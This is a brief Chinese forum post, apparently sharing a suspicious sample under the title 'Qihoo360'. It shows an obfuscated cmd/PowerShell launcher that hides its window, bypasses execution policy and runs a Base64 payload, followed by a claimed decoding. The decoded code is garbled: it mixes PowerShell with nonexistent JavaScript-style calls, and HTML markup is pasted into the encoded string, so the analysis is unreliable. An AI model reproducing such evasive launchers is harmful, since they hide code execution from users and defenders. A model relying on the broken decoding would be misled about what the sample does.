本帖最后由 DisaPDB 于 2024-3-20 17:56 编辑
Qihoo360
Code:
- C:\WINDOWS\system32\cmd.exe /c start /min "" p^o^w^ershell.ex^e -W^i^n^d^owSt^yle h^id^de^n -No^Lo^go -N^o^Pro^f^i^l^e -Exec^ut^i^o^nP^oli^c^y by^p^ass -C^omm^a^n^d "$qcljngg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('<span style="background-color: rgba(175, 184, 193, 0.2); color: rgb(31, 35, 40); font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, "Liberation Mono", monospace; font-size: 13.6px; white-space: break-spaces;">JGNvbnRleHQ9Ilx4NWNcdTAwMzFcdTAwM2FcdTAwMzlcdTAwMzhcdTAwM2ZcdTAwMzVcdTAwM2QnKCRfLkNvbnRleHQpOyRkYXRhPSJceDVjXHUwMDMyXHUwMDNjXHUwMDM4XHUwMDM5XHUwMDNmXHUwMDM1XHUwMDNkIjtmb3IoJGk9MDskaTxkYXRhLmxlbmd0aDsrKykgeyAkZGF0YVskaV09JGRhdGFbJGldLmNoYXJDb2RlQXQoMCktMTI4O30kZXhlY3V0ZT0iJGNvbnRleHQ6JGRhdGEiOyRFeGVjdXRpb25Qb2xpY3kgPSAiQnlwYXNzIjskUHJvY2VzcyA9ICJuYXZpZ2F0b3IuZXhlY3V0ZShTeW1ib2wuQXNzdW1wdGlvbi5nZXRSZXNvdXJjZSgiTWljcm9zb2Z0LlVJIiwiUGFnZUNvbnRlbnQuRXhlY3V0ZUV4dGVuc2lvbiIpLmV4ZWN1dGVFeHRlbnNpb24oJGV4ZWN1dGUpLCBudWxsLCBudWxsLCBudWxsKTsi</span>
复制代码 Base64 Decoding:
- $context = "\x5c\x31\x3a\x39\x38\x3f\x35\x3d'($_.Context)";
- $data = "\x5c\x32\x3c\x38\x39\x3f\x35\x3d";
- for ($i = 0; $i -lt $data.Length; $i++) {
- $data[$i] = $data[$i].charCodeAt(0) - 128;
- }
- $execute = "$context:$data";
- $ExecutionPolicy = "Bypass";
- $Process = "navigator.execute(Symbol.Assumption.getResource(`"Microsoft.UI`", `"PageContent.ExecuteExtension`").executeExtension($execute), null, null, null);"
复制代码
|